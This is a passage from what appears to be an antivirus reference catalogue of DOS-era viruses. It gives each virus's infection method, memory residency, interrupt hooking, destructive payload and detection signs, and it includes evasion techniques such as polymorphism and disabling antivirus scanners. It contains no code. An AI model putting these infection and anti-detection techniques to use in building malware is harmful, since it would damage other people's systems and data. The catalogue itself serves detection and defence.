  9740. virus proceeds to infect it.
  9741.  
  9742. Damage: ?
  9743.  
  9744. Detecting Method: Infected file sizes increase by 3072 bytes.
  9745.  
  9746. [Terminal]
  9747. Virus Name: Terminal
  9748. Virus Type: EXE & COM File infector
  9749. Virus Length:
  9750.  
  9751. Executing Procedure: Virus searches for an uninfected EXE file on
  9752. current directory from diskette C, then infects it.
  9753.  
  9754. Damage: It will overwrite original files with a virus code.
  9755. Original files are destroyed.
  9756.  
  9757. Note:
  9758. 1) Does not stay in memory.
  9759. 2) You will see an error message when writing because INT 24h has
  9760.    not been hanged.
  9761. 3) This virus is written with an advanced language.
  9762. 4) This virus is encrypted by a program like PKLITE. Although it
  9763.    has a pattern, but we cannot scan it.
  9764.  
  9765. [Lanc]
  9766. Virus Name: Lanc
  9767. Virus Type: EXE File infector
  9768. Virus Length: 7,376 bytes
  9769.  
  9770. Executing Procedure: Virus searches for an uninfected EXE file on
  9771. current directory. Then creates a new COM file with the same file
  9772. name as the original EXE file. This new COM file is the virus.
  9773.  
  9774. Damage: None
  9775.  
  9776. Note:
  9777. 1) Does not stay in memory.
  9778. 2) You will see an error message when writing because INT 24h has
  9779.    not been hanged.
  9780. 3) This virus is written with an advanced language.
  9781.  
  9782. Detecting Method: Check whether the file length is 7376 bytes.
  9783.  
  9784. [Nazi-Phobia]
  9785. Virus Name: Nazi-Phobia
  9786. Virus Type: EXE File infector
  9787. Virus Length:
  9788.  
  9789. Executing Procedure: Virus searches for an uninfected EXE file on
  9790. current directory, then infects it. It only infects one file at a
  9791. time.
  9792.  
  9793. Damage: It will overwrite original files with a virus code.
  9794. Original files are destroyed.
  9795.  
  9796. Note:
  9797. 1) Does not stay in memory.
  9798. 2) You will see an error message when writing because INT 24h has
  9799.    not been hanged.
  9800. 3) This virus is written with an advanced language.
  9801.  
  9802. [Animus]
  9803. Virus Name: Animus
  9804. Virus Type: COM & EXE File infector
  9805. Virus Length: 7,360 or 7,392 bytes
  9806.  
  9807. Executing Procedure: Virus searches for an uninfected COM or EXE
  9808. file on current directory, then infects it. It  can infect two or
  9809. three files at a time.
  9810.  
  9811. Damage: None
  9812.  
  9813. Note:
  9814. 1) Does not stay in memory.
  9815. 2) You will see an error message when writing because INT 24h has
  9816.    not been hanged.
  9817. 3) This virus is written with an advanced language.
  9818.  
  9819. Detecting Method: Infected file sizes increase by 7360 or 7392
  9820. bytes.
  9821.  
  9822. [Hitler]
  9823. Virus Name: Hitler
  9824. Virus Type: COM File infector
  9825. Virus Length:  4,808 bytes
  9826.  
  9827. Executing Procedure: Checks whether it has remained resident in
  9828. memory. If not, it will stay resident in high memory. Then hooks
  9829. INT 21h and goes back to original routine.
  9830.  
  9831. Vectors hooked: Hooks INT 21H(AH=4Bh)to infect files. First, it
  9832. will hang INT 24h to prevent divulging its trace when writing. If
  9833. the program to be executed is an uninfected COM file, virus
  9834. proceeds to infect it.
  9835.  
  9836. Damage: None
  9837.  
  9838. Detecting Method: Infected file sizes increase by 4808 bytes.
  9839.  
  9840. [Hellwean-1182]
  9841. Virus Name: Hellwean1182
  9842. Virus Type: EXE & COM File infector
  9843. Virus Length:  1182 bytes
  9844.  
  9845. Executing Procedure: Checks whether it has remained resident in
  9846. memory. If not, it will reside in high memory. Then hooks INT 21h
  9847. and goes back to original routine.
  9848.  
  9849. Vectors hooked: Hooks INT 21H(AH=4Bh)to infect  files. First, it
  9850. will hang INT 24h to prevent divulging its trace when writing. If
  9851. the program to be executed is an uninfected COM or EXE file,
  9852. virus proceeds to infect it.
  9853.  
  9854. Damage: None
  9855.  
  9856. Detecting Method: Infected file sizes increase by 1182 bytes.
  9857.  
  9858. [Minsk-GH]
  9859. Virus Name: Minsk-Gh
  9860. Virus Type: EXE & COM File infector
  9861. Virus Length:  1450-1490 bytes
  9862.  
  9863. Executing Procedure: Checks whether it has remained resident in
  9864. memory. If not, it will stay resident in high memory. Then hooks
  9865. INT 21h and goes back to original routine.
  9866.  
  9867. Vectors hooked: Hooks INT 21H(AH=4Bh)to infect files. First, it
  9868. will hang INT 24h to prevent divulging its trace when writing. If
  9869. the program to be executed is an uninfected COM or EXE file,
  9870. virus proceeds to infect it.
  9871.  
  9872. Damage: None
  9873.  
  9874. Note: This virus cannot run on DOS 5.0.
  9875.  
  9876. Detecting Method: Infected file sizes increase by 1450-1490
  9877. bytes.
  9878.  
  9879. [LV]
  9880. Virus Name: Lv
  9881. Virus Type: COM File infector
  9882. Virus Length:
  9883.  
  9884. Executing Procedure: Checks whether it has remained resident in
  9885. memory. If not, it will reside in high memory. Then hooks INT
  9886. 21h, and then checks whether COMMAND.COM that booted up system
  9887. has been infected or not. If not, virus infects it and returns to
  9888. original routine.
  9889.  
  9890. Vectors hooked: Hooks INT 21H (AH=4Bh) to infect files. First, it
  9891. will hang INT 24h to prevent divulging its trace when writing. If
  9892. the program to be executed is an uninfected COM file, virus
  9893. proceeds to infect it.
  9894.  
  9895. Damage: It will overwrite original files with a virus code.
  9896. Original files are destroyed.
  9897.  
  9898. [Mini-207]
  9899. Virus Name: Mini-207
  9900. Virus Type: COM File infector
  9901. Virus Length:  207 bytes
  9902.  
  9903. Executing Procedure: Virus searches for all uninfected COM files
  9904. on current directory, then infects them.
  9905.  
  9906. Note:
  9907. 1) Does not stay in memory.
  9908. 2) You will see an error message when writing because INT 24h has
  9909.    not been hanged.
  9910.  
  9911. Damage: It will overwrite original files with virus code.
  9912. Original files are destroyed.
  9913.  
  9914. [Brother_300]
  9915. Virus Name: Brother_300
  9916. Virus Type: EXE File infector
  9917. Virus Length:  300 bytes
  9918.  
  9919. Executing Procedure: Checks whether it has stayed resident in
  9920. memory. If not, it will stay resident in high memory. Then hooks
  9921. INT 21h and goes back to original routine.
  9922.  
  9923. Vectors hooked: Hooks INT 21H(AH=4Bh) to infect files. First, it
  9924. hangs INT 24h to prevent divulging its trace when writing. If the
  9925. program to be executed is an uninfected EXE file, then creates a
  9926. new COM file with the same name as the EXE file. This new COM
  9927. file is the virus. Its length is 300 bytes.
  9928.  
  9929. Damage: None
  9930.  
  9931. Detecting Method: Checks whether the file's length is 300 bytes.
  9932.  
  9933. [Lip-286]
  9934. Virus Name: Lip-286
  9935. Virus Type: COM File infector
  9936. Virus Length: 286 bytes
  9937.  
  9938. Executing Procedure: Virus searches for an uninfected COM file on
  9939. current directory, then infects it. It can infect two or three
  9940. files at a time.
  9941.  
  9942. Damage: There is a flag in virus procedure (Every infected file
  9943. has a different flag). The flag decreases by 1 every time virus
  9944. infects a file. When the flag is equal to zero, it will destroy
  9945. all data on hard diskette.
  9946.  
  9947. Note:
  9948. 1) Does not stay in memory.
  9949. 2) You will see an error message when writing because INT 24h has
  9950.    not been hanged.
  9951.  
  9952. Detecting Method: Infected file sizes increase by 286 bytes.
  9953.  
  9954. [Gomb]
  9955. Virus Name: Gomb
  9956. Virus Type: COM File infector
  9957. Virus Length:  4093 bytes
  9958.  
  9959. Executing Procedure: Checks whether it has stayed resident in
  9960. memory. If not, it will stay resident in high memory. Then hooks
  9961. INT 21h and goes back to original routine.
  9962.  
  9963. Vectors hooked: Hooks INT 21H(AH=4Bh) to infect files. If the
  9964. program to be executed is an uninfected COM file, virus proceeds
  9965. to infect it.
  9966.  
  9967. Damage: None
  9968.  
  9969. Detecting Method: Infected file sizes increase by 4093 bytes.
  9970.  
  9971. [Bert]
  9972. Virus Name: Bert
  9973. Virus Type: COM & EXE File infector
  9974. Virus Length:  2294 bytes
  9975.  
  9976. Executing Procedure:
  9977. Checks whether it has stayed resident in memory. If not, it will
  9978. stay resident in high memory. Then hooks INT 21h and goes back to
  9979. original routine.
  9980.  
  9981. Vectors hooked:
  9982. Hooks INT 21H(AH=4Bh)to infect files. If the program to be
  9983. executed is an uninfected COM or EXE file, virus proceeds to
  9984. infect it.
  9985.  
  9986. Damage: None
  9987.  
  9988. Detecting Method: Infected file sizes increase by 2294 bytes.
  9989.  
  9990. [Triple Shot]
  9991. Virus Name: Triple-shot
  9992. Virus Type: EXE File infector
  9993. Virus Length: 6610
  9994.  
  9995. Executing Procedure: Searches for an uninfected EXE file on
  9996. current directory. Then creates a new hidden COM file with the
  9997. same name as the EXE file. This new COM file is the virus. Its
  9998. length is 6610 bytes.
  9999.  
  10000. Damage: None
  10001.  
  10002. Note:
  10003. 1) Does not stay in memory.
  10004. 2) You will see an error message when writing because INT 24h has
  10005.    not been hanged.
  10006.  
  10007. Detecting Method: Checks whether the file's length is 6610 bytes.
  10008.  
  10009. [Fame]
  10010. Virus Name: Fame
  10011. Virus Type: EXE File infector
  10012. Virus Length:  896 bytes
  10013.  
  10014. Executing Procedure:
  10015. Checks whether it has stayed resident in memory. If not, it will
  10016. stay resident in high memory. Then hooks INT 21h and goes back to
  10017. original routine.
  10018.  
  10019. Vectors hooked:
  10020. Hooks INT 21H(AH=4Bh) to infect files. First, it will hang INT
  10021. 24h to prevent divulging its trace when writing. If the program
  10022. to be executed is an uninfected EXE file, virus proceeds to
  10023. infect it.
  10024.  
  10025. Damage: None
  10026.  
  10027. Detecting Method: Infected file sizes increase by 896 bytes.
  10028.  
  10029. [CCCP]
  10030. Virus Name: Cccp
  10031. Virus Type: COM File infector
  10032. Virus Length: 510 bytes
  10033.  
  10034. Executing Procedure: Searches for an uninfected COM file on
  10035. current directory, then infects it. It can infect two or three
  10036. files at a time.
  10037.  
  10038. Damage: There is a flag (value from 0 to 25) in virus procedure
  10039. (Every infected file has a different flag). When an infected file
  10040. with flag of 25 is executed, it will destroy all data on hard
  10041. diskette.
  10042.  
  10043. Note:
  10044. 1) Does not stay in memory.
  10045. 2) You will see an error message when writing because INT 24h has
  10046.    not been hanged.
  10047.  
  10048. Detecting Method: Infected file sizes increase by 510 bytes.
  10049.  
  10050. [L1]
  10051. Virus Name: L1
  10052. Virus Type: COM File infector
  10053. Virus Length:  140 bytes
  10054.  
  10055. Executing Procedure: Checks whether it has stayed resident in
  10056. memory. If not, it will stay resident in high memory. Then hooks
  10057. INT 21h and goes back to original routine.
  10058.  
  10059. Vectors hooked: Hooks INT 21H(AH=4Bh) to infect files. If the
  10060. program to be executed is an uninfected COM file, virus proceeds
  10061. to infect it.
  10062.  
  10063. Damage: None
  10064.  
  10065. Note: You will see an error message when writing because INT 24h
  10066. has not been hanged. Detecting Method: Infected file sizes
  10067. increase by 140 bytes.
  10068.  
  10069. [Crepate]
  10070. Virus Name: Crepate
  10071. Virus Type: Virus infects .COM between  400 and 62000 bytes.
  10072.             Infects .EXE shorter than 589824 bytes. Virus is a
  10073.             Memory Block Resident.
  10074. Virus Length:  2910 bytes on file and 4K bytes in memory.
  10075.  
  10076. Interrupt Vectors Hooked: INT 21h.
  10077.  
  10078. Infection Process: Every infected file becomes 2910 bytes longer,
  10079. with the virus code at the end and some kind of a header created
  10080. by the virus. The second group of bytes indicating the time of
  10081. creation of the file, is set to 31 (1Fh).  Every subsequent file
  10082. infection, the  virus resets the system memory from address 0:413
  10083. to 280h (640 K).
  10084.  
  10085. Damage:  Virus formats hard disk.
  10086.  
  10087. Symptoms: Loss of data stored in last 7 sectors of the diskette, loss
  10088. of data stored in last cylinder, first side, first 7 sectors
  10089. increased file size.
  10090.  
  10091. Note: This virus doesn't infect files named as : "*AN.???" or
  10092. "*LD.???" To recognize the virus presence in the boot sector one
  10093. can look for:
  10094. - a byte with value FFh in the offset 4 in floppy disks.
  10095. - a word with value 2128h in the offset 4 in hard disks.
  10096. Furthermore, at the end of each infected file, a text string can
  10097. be found with the clear text
  10098.  
  10099.     "Crepa (C) bye R.T.".
  10100.  
  10101. This text can be easily modified. The DOS Chkdsk command, when
  10102. the virus is resident, reveals a decreasing of 4K bytes in the
  10103. available memory.
  10104.  
  10105. [Die Lamer]
  10106. Virus Name:  DIE LAMER
  10107. Virus Type: Resident at the top of the MCB (Memory Control
  10108.             Block).
  10109. Virus Length: 1,136 bytes
  10110.  
  10111. Interrupt Vectors Hooked: INT 21h.
  10112.  
  10113. Infection Process:
  10114. This virus is spread by executing an infected program. When a DIE
  10115. LAMER infected program is executed, it will first check to see if
  10116. it is already resident in memory by checking if address 0:4f2h
  10117. contains the value 3232h.  If it is already in memory it will
  10118. execute the infected program.  If it is not in memory, it will
  10119. perform the following functions:
  10120.  
  10121. Damage: Loss of some data stored in the floppy diskette.
  10122.  
  10123. Symptoms: Garbage in floppy disk. Increased file sizes. Screen
  10124. displays
  10125.  
  10126.           "-=*@DIE_LAMER@*=-."
  10127.  
  10128. Note: The method used by the virus is very dangerous, because if
  10129. an anti-virus program catches this virus in memory and displays
  10130. the message: "found '-=*@DIE_LAMER@*=-' in memory", the virus
  10131. will only write garbage to the floppy diskette, but the virus
  10132. program can be easily modified to execute more destructive
  10133. routines(such as formatting the hard disk etc...).
  10134.  
  10135. [FaxFree]
  10136. Virus Name: FAXFREE
  10137. Virus Type: Virus infects .COM and .EXE files as long as they are
  10138.             longer than 32 bytes,  and shorter than 131,072
  10139.             bytes. Infects on Partition record.  File Infector
  10140.             Virus.
  10141. Virus Length: 3 Kb
  10142.  
  10143. Interrupt Vectors Hooked: INT 21h.
  10144.  
  10145. Infection Process: This virus can be spread by executing an
  10146. infected program or from booting the system with an infected
  10147. disk. There are several methods of infection. When an infected
  10148. program is executed in a clean system, the virus first removes
  10149. the contents of the original partition sector of the hard disk to
  10150. the last sector of the last side of the last cylinder.  Then the
  10151. virus will copy itself in the last side of the last cylinder,
  10152. beginning from the 9th last sector to the 6th last sector.  These
  10153. sectors are not marked as "bad sectors" and get overwritten by
  10154. the virus, with no regards for their previous contents.
  10155.  
  10156. Damage: Hangs system.  Infected files will increase in length by
  10157. 2048 bytes, with the virus code file infection.
  10158.  
  10159. Symptoms: When the virus wants to replace the original partition
  10160. sector, it needs to decrypt some data which after decryption
  10161. shows the following text strings :
  10162.  
  10163.     "PISello tenere fuori dalla portata dei bambini.
  10164.     PaxTibiQuiLegis.FaxFree!!"
  10165.  
  10166. Note: This virus doesn't infect files named as : "*AN.???" ,
  10167. "*OT.???" or "*ND.???" If the system date is between the 25th and
  10168. 30th of April, the virus will hang the system. The virus uses a
  10169. smart technique to avoid anti-virus detection programs, when
  10170. modifying the partition sector that is hooking int 01h, it will
  10171. turn on a single step flag to get the original entry of DOS
  10172. hooked.  The virus will then move itself to the top of the MCB
  10173. (Memory Control Block), and decrease available memory in the MCB
  10174. by 3Kb.  It will hook Int 13h and Int 21h and then run the
  10175. original program.
  10176.  
  10177. [Ghost Player]
  10178. Virus Name: GHOST PLAYER
  10179. Virus Type: Virus infects .EXE files.  Virus is a Memory Block
  10180.             Resident.
  10181. Virus Length: 1,200 bytes.
  10182.  
  10183. Interrupt Vectors Hooked: INT 21h.
  10184.  
  10185. Infection Process: This virus is spread by executing an infected
  10186. program. When a GHOST PLAYER infected program is executed, if DOS
  10187. version is greater than 3 and the serial number of default disk
  10188. equals zero, virus will execute the infected program. Otherwise
  10189. virus performs the following functions: virus stays resident at
  10190. the top of the MCB (memory control block)  but below the DOS 640k
  10191. boundary. The available free memory will decrease by 1200 (4B0H)
  10192. bytes.
  10193.  
  10194. Damage:  Virus increases file lengths.
  10195.  
  10196. Symptoms: Decreased available memory.  If a random value is equal
  10197. to FF00, virus displays the following message:" !  Bumpy
  10198. Furthermore, the screen shakes up and down.
  10199.  
  10200. Note: Virus doesn't infect files named as : "TB*.???" , "F-*.???"
  10201. , "CP*.???" , "NA*.???" , "SC*.???" "CL*.???" or "V*.???".
  10202.  
  10203. [Gold Bug]
  10204. Virus Name: GOLD-BUG
  10205. Virus Type: Spawning Color Video Resident and Extended HMA Memory
  10206.             Resident Boot-Sector and Master-Sector Infector
  10207. Virus Length: 1,024 Bytes.
  10208.  
  10209. Interrupt Vectors Hooked: INT 21h, INT 13h
  10210.  
  10211. Infection Process: GOLD-BUG is a memory-resident multipartite
  10212. polymorphic stealthing boot-sector spawning anti-antivirus virus
  10213. that works with DOS 5 and DOS 6 in the HIMEM.SYS memory.  When an
  10214. .EXE program infected with the GOLD-BUG virus is run, it
  10215. determines if it is running on an 80186 or better, if not it will
  10216. terminate and not install. If it is on an 80186 or better it will
  10217. copy itself to the partition table of the hard disk and remain
  10218. resident in memory in the HMA (High Memory Area) only if the HMA
  10219. is available, ie. DOS=HIGH in the CONFIG.SYS file else no
  10220. infection will occur.  The old partition table is moved to sector
  10221. 14 and the remainder of the virus code is copied to sector 13.
  10222. The virus then executes the spawned associated file if present.
  10223. INT 13 and INT 2F are hooked into at this time but not INT 21.
  10224. The spawning feature of this virus is not active now.
  10225.  
  10226. Damage: The GOLD-BUG virus also has an extensive anti-antivirus
  10227. routine.  It writes to the disk using the original BIOS INT 13
  10228. and not the INT 13 chain that these types of programs have hooked
  10229. into.  It hooks into the bottom of the interrupt chain rather
  10230. than changing and hooking interrupts. If the GOLD-BUG virus is
  10231. resident in memory, any attempts to run most virus scanners will
  10232. be aborted. GOLD-BUG stops any large .EXE file (greater than 64k)
  10233. with the last two letters of "AN" to "AZ".  It will stop
  10234. SCAN.EXE, CLEAN.EXE, NETSCAN.EXE, CPAV.EXE, MSAV.EXE,
  10235. TNTAV.EXE,etc., etc. The SCAN program will either be deleted or
  10236. an execution error will return.  Also, GOLD-BUG will cause a CMOS
  10237. checksum failure to happen next time the system boots.  GOLD-BUG
  10238. also erases "CHKLIST.???" created by CPAV.EXE and MSAV.EXE.
  10239. Programs that do an internal checksum on themselves will not
  10240. detect any changes.
  10241.  
  10242. Symptoms: CMOS checksum failure.  Creates files with no
  10243. extension; Modem answers on 7th ring.  Most virus scanners fail
  10244. to run or are Deleted. And CHKLIST.??? files are deleted.
  10245.  
  10246. Note: The GOLD-BUG virus is also Polymorphic. Each .EXE file it
  10247. creates only has 2 bytes that remain constant.   It can mutate
  10248. into 128 different decryption patterns. It uses a double
  10249. decryption technique that involves INT 3 that makes it very
  10250. difficult to decrypt using a debugger.  The assembly code allowed
  10251. for 512 different front-end decryptors. Each of these can mutate
  10252. 128 different ways.
  10253.  
  10254. [Invisible Man]
  10255. Virus Name: INVISIBLE MAN
  10256. Virus Type: Virus infects .COM and .EXE files, Partition record,
  10257.             and the Boot record. Virus is  a Memory Block
  10258.             Resident.
  10259. Virus Length: 2926 Bytes on file and D80h Bytes in memory.
  10260.  
  10261. Interrupt Vectors Hooked:  INT 21h
  10262.  
  10263. Infection Process:
  10264. This virus can spread by executing an infected program or by
  10265. booting the system from an infected Disk. There are several
  10266. different methods of infection:
  10267.  
  10268. (1). When an  INVISIBLE MAN infected program is executed it will;
  10269.  
  10270.       A. Infect the hard disk partition table :
  10271.      (i) Write the virus body to the last 7 sectors of the active
  10272.          hard disk.
  10273.     (ii) The ending location of the active hard disk will be
  10274.          decreased by 7 sectors.
  10275.    (iii) Write the virus loader to the partition sector. This
  10276.          sector will be encrypted.
  10277.  
  10278.       B. Modify the boot sector:
  10279.       It will change the total sector numbers message, which will
  10280.       be seven less than the original figure.
  10281.  
  10282. Damage: Virus displays message and plays music on system speaker.
  10283.  
  10284. Symptoms:
  10285. Loss of data stored in the last 7 sectors of the hard disk;
  10286. increased file sizes. File sizes increase by 2926 bytes.  Virus
  10287. displays the following message:
  10288.  
  10289.     "I'm the invisible man, I'm the invisible man Incredible how
  10290.      you can See right through me."
  10291.  
  10292. Virus also plays music on system speaker.
  10293.  
  10294. [Junkie]
  10295. Virus Name: Junkie
  10296. Virus Type: Memory-Resident Multipartite.
  10297. Virus Length:  512 bytes.
  10298.  
  10299. Interrupt Vectors Hooked: INT 21h.
  10300.  
  10301. Infection Process:
  10302. Once a virus-infected program is run, the virus installs itself
  10303. in memory as a terminate-and-stay- resident program. On the
  10304. system area of the hard disk, the virus copies two 512-byte
  10305. sectors of code into the first track of the hard disk.  The virus
  10306. then modifies the existing master boot record of the hard disk to
  10307. read the extra sectors and execute them upon boot-up.
  10308.  
  10309. Damage:  Virus adds approx. 1,024 bytes of virus code to the end
  10310. of the infected file.
  10311.  
  10312. [March 25th]
  10313. Virus Name: March-25th
  10314. Virus Type: Virus infects .EXE and .COM files. The MARCH-25H
  10315.             virus will infect  .COM  and .EXE files which are
  10316.             shorter than 196608 Bytes in length.
  10317. Virus Length: 1056 Bytes.
  10318.  
  10319. Interrupt Vectors Hooked: INT 21h.
  10320.  
  10321. Infection Process:
  10322. This virus is spread by executing an infected program. When a
  10323. MARCH-25H infected program is executed, it will check to see if
  10324. it is already resident in memory by checking to see if address
  10325. 0:212h contains the value F100h. If is already in memory it will
  10326. execute the infected program. Virus stays resident at the top of
  10327. the MCB (memory control block) but below the DOS 640k boundary.
  10328. The available free memory will have decreased by 1056 (420H)
  10329. bytes. It will infect .EXE and .COM programs when they are
  10330. executed from hard disk.
  10331.  
  10332. Damage:
  10333. Virus destroys Hard Disk. Infected files will have a file length
  10334. increase of 1025 - 1040 (401h - 410h) bytes with the virus being
  10335. located at the end of the file.
  10336.  
  10337. Symptoms: Virus causes data on C drive to be lost.
  10338.  
  10339. Note:
  10340. If the system date is March 25 of any year, virus will proceed to
  10341. write garbage to:
  10342. C drive sector 0 - 6 , cylinder 0 , head 0
  10343. C drive sector 1 - 7 , cylinder 1 , head 0
  10344. C drive sector 1 - 7 , cylinder 2 , head 0."
  10345.  
  10346. [Minosse]
  10347. Virus Name: MINOSSE
  10348. Virus Type: EXE files only: MBR
  10349. Virus Length: 5772 bytes
  10350.  
  10351. Interrupt Vectors Hooked: INT 21h
  10352.  
  10353. Infection Process:
  10354. MINOSSE is a polymorphic virus which prevents the Debug.exe
  10355. program from tracing this virus. When a MINOSSE infected program
  10356. is executed, it will;
  10357. 1. Hook int 8xh - int 9xh:  (x:any number) First, it will hook
  10358.    int 8xh - 9xh, and then it will run this interrupt to get into
  10359.    virus entry and decrypt the virus body.
  10360. 2. Stay resident at the top of MCB (memory control block) but
  10361.    below the 640k DOS boundary.
  10362.  
  10363. Damage:
  10364. Virus will hang the System when System date is greater than June
  10365. and the day is  the 25th. Infected programs will have a file
  10366. length increase of 3075 bytes with the virus being located at the
  10367. end of the file.   The available free memory will have decreased
  10368. by 5772 bytes.
  10369.  
  10370. Symptoms: Decreased available memory. Virus will display the
  10371. following message,
  10372.  
  10373.     "Minose 1V5 (c) 93 WilliWonka."
  10374.  
  10375. Note:
  10376. This virus is a polymorphic and also a very smart virus.  It is
  10377. not easy to detect by scan programs because it hasn't the same
  10378. code for scan, and it is not easy to find using the interrupt
  10379. vectors because it recovers int 21h to the original vector.
  10380.  
  10381. [Mombasa]
  10382. Virus Name: MOMBASA
  10383. Virus Type: Virus infects .COM files.
  10384. Virus Length: 3584 bytes.
  10385.  
  10386. Interrupt Vectors Hooked:  INT 21h and 08h.
  10387.  
  10388. Infection Process:
  10389. MOMBASA is a polymorphic virus and uses INT 01h and INT 03h to
  10390. prevent tracing this virus.  When a MOMBASA infected program is
  10391. executed, it will; Stay resident at the top of MCB (memory
  10392. control block) but below the 640k DOS boundary. The available
  10393. free memory will have decreased by 3584 bytes. It will hook int
  10394. 08h to detect if int 21h is changed by another program. If the
  10395. INT 21h vector is changed, the virus will change it's vector to
  10396. the new INT 21h vector and will hook its vector to int 21h again.
  10397. It will infect .COM programs and try to infect C:\COMMAND.COM
  10398. when they are executed..  When MOMBASA is memory resident it will
  10399. hide the file size change because the virus recovers the original
  10400. file length.  When creating a directory , removing a directory,
  10401. or selecting a default drive such as A: or B:, virus writes some
  10402. data to the disk/diskette, but without success.
  10403.  
  10404. Damage:
  10405. Screen slowly fades until completely blank.  The system then
  10406. proceeds to hang. Virus destroys Boot sector and FAT of the hard
  10407. drive. Infected programs will have a file length increase of 3568
  10408. bytes with the virus being located at the end of the file.
  10409.  
  10410. Symptoms: Virus displays the following message,
  10411.  
  10412.     "I'm gonna die...Attack radical...Mombosa virus (MM 92')."
  10413.  
  10414. [NOV-17-768]
  10415. Virus Name: NOV-17-768
  10416. Virus Type: Infects .COM shorter than 59920 Bytes infects .EXE.
  10417. Virus Length: Virus infects 768 Bytes on file and 800 Bytes in
  10418.               memory.
  10419.  
  10420. Interrupt Vectors Hooked: INT 21h.
  10421.  
  10422. Infection Process: This virus is a variant of the November-17th
  10423. virus: The November 17th virus was received in January, 1992. Its
  10424. origin or point of original isolation was originally unknown, but
  10425. it has since been reported as being widespread in Rome, Italy,
  10426. during the month of December, 1991. November 17th  is a memory
  10427. resident infector of .COM and .EXE programs, including
  10428. COMMAND.COM. The first time a program infected with November 17th
  10429. is executed, the virus will install itself memory resident at the
  10430. top of system memory but below the 640K DOS boundary.
  10431.  
  10432. Damage:
  10433. Virus destroys current disk from sector 1 to sector 8. Total
  10434. system and available free memory, as indicated by the DOS CHKDSK
  10435. program, will decrease by 896 bytes.  Interrupt 12's return will
  10436. not have been moved. Interrupts 09 and 21 will be hooked.
  10437.  
  10438. Symptoms: Infected programs will have a file length increase of
  10439. 855 bytes with the virus being located at the end of the infected
  10440. file. There will be no visible change to the file's date and time
  10441. in a DOS disk directory listing Note:
  10442.  
  10443. [NOV-17-800]
  10444. Virus Name: NOV-17-800
  10445. Virus Type: Virus infects .COM and .EXE files, Memory Block
  10446.             Resident. Virus does not infect. "SCAN", "CLEAN."
  10447.  
  10448. Virus Length: 800 bytes on file and 832 bytes in memory.
  10449.  
  10450. Interrupt Vectors Hooked: INT 09h and 21h.
  10451.  
  10452. Infection Process:
  10453. The first time a program infected with November 17th is executed,
  10454. the virus will install itself memory resident at the top of
  10455. system memory but below the 640K DOS boundary.
  10456.  
  10457. Damage: Virus destroys hard disk FAT. When the value of [00:46E]
  10458. is changed and the month = 1, the virus will then write garbage
  10459. to current disk from sectors 1 to 8.
  10460.  
  10461. Symptoms: File sizes increase by 800 bytes. Decreased available
  10462. memory by 800 bytes.
  10463.  
  10464. [Protovir]
  10465. Virus Name: PROTOVIR
  10466. Virus Type: Virus infects .COM files and resides in HiMem.
  10467. Virus Length: 730 bytes on file and 270 in memory. Interrupt
  10468.  
  10469. Vectors Hooked: INT 21h.
  10470.  
  10471. Infection Process:
  10472. Virus infects .COM  programs when they are executed. Infected
  10473. files will have a file length increase of 730 bytes with the
  10474. virus being located at the end of the file.  Virus updates the
  10475. first 7 bytes, makes the file head point to the virus code, and
  10476. reserves the first 7 bytes at the end of the infected file .
  10477.  
  10478. Damage: Increased file sizes. Decreased available memory.
  10479.  
  10480. Symptoms: Available free memory will decrease by 720 bytes.
  10481.  
  10482. [Red Spider]
  10483. Virus Name: RED SPIDER
  10484. Virus Type: Virus infects .COM files that are between 2,000
  10485.             (7D0H) and 63,500 (F80CH) bytes in length. Infect
  10486.             .EXE files that are smaller than 524,288 (80000H)
  10487.             byte.  Virus is a Memory Block Resident.  A File
  10488.             Infector Virus.
  10489. Virus Length: 949 - 964 bytes on file.
  10490.  
  10491. Interrupt Vectors Hooked: INT 21h.
  10492.  
  10493. Infection Process:
  10494. Virus stays resident at the top of the MCB (memory control block)
  10495. but below the DOS 640k boundary. Virus infects .EXE and .COM
  10496. programs when they are executed. Infected files will have a file
  10497. length increase of 949 - 964 bytes with the virus being located
  10498. at the end of the file.
  10499.  
  10500. Damage: Increased file sizes.  Decreased available memory.
  10501.  
  10502. Symptoms: The available free memory decreases by 976 bytes.
  10503.  
  10504. Note: If COMMAND.COM is infected, the file length will not
  10505. change. This virus will not  infect. The following text strings
  10506. can be found encrypted in the virus code:
  10507.  
  10508.     "Red Spider Virus created by Garfield from Zielona Gora in
  10509.      Feb 1993 ....... "
  10510.  
  10511. [Hello Shshtay]
  10512. Virus Name: HELLO-SHSHTAY
  10513. Virus Type: Virus infects .COM files shorter than 63,776 bytes and
  10514.             .EXE files shorter than 52,428 bytes.  Virus is a
  10515.             Memory Block Resident.
  10516. Virus Length: EXE files:1,840 - 1,855 bytes and
  10517.               COM files: 1,600 - 1615 bytes. 1792 bytes in memory.
  10518.  
  10519. Interrupt Vectors Hooked: INT 21h.
  10520.  
  10521. Infection Process:
  10522. Virus stays resident at the top of the MCB (memory control block)
  10523. but below the DOS 640k boundary. The available free memory
  10524. decreases by 1792 bytes. Virus  infects .EXE and .COM  programs
  10525. when they are executed. Infected .EXE files will have a file
  10526. length increase of 1840 - 1855 bytes and infected .COM files will
  10527. have a file length increase of 1600-1615 bytes with the virus
  10528. being located at the end of  the file in both cases.
  10529.  
  10530. Damage: Increased file sizes.  Decreased available memory.
  10531.  
  10532. Symptoms: Virus displays the following message on screen:
  10533.  
  10534.         "HELLO SHSHTAY"
  10535.         "GODBYE AMIN "
  10536.         "HELLO SHSHTAY"
  10537.         " ZAGAZIG UNIV"
  10538.  
  10539. Note: If the system date is greater than or equal to January,
  10540. 1994, it will hook INT 1Ch , INT 09h & set a counter = 0.
  10541. Interrupt 1ch will add one to the counter 18.2 times every second
  10542. and when the counter is greater than or equal to 3786 (ECAh) it
  10543. will trigger INT 09h and reset the counter back to 0. When
  10544. Interrupt 09h is activated, it will put a message into the
  10545. keyboard buffer, so around every 208 (3786/18.2) seconds, the
  10546. screen will display one message in turn from the above list.
  10547.  
  10548. [Star Dot]
  10549. Virus Name: STARDOT
  10550. Virus Type: Virus infects .EXE files.  File Infector Virus.
  10551. Virus Length: 592 - 608 bytes on file.
  10552.  
  10553. Interrupt Vectors Hooked: INT21h.
  10554.  
  10555. Infection Process:
  10556. Virus only infects .EXE programs when they are executed. There
  10557. will be a file length increase of 592 - 608 bytes  with the virus
  10558. being located at the end of the file. When the virus infects
  10559. another clean program, it adds a counter and writes the value and
  10560. virus body into a clean program, so the virus will get the day of
  10561. the week and compare with the lowest 3 bits of the counter. If
  10562. the value is equal, it will randomly destroy the current disk
  10563. sector 8 times. If the counter value is equal to 63 (3Fh), it
  10564. will send the random data to system I/O port(from 380h to 3DFh).
  10565.  
  10566. Damage: Virus destroys current disk sector and sends random data
  10567. to system I/O port.
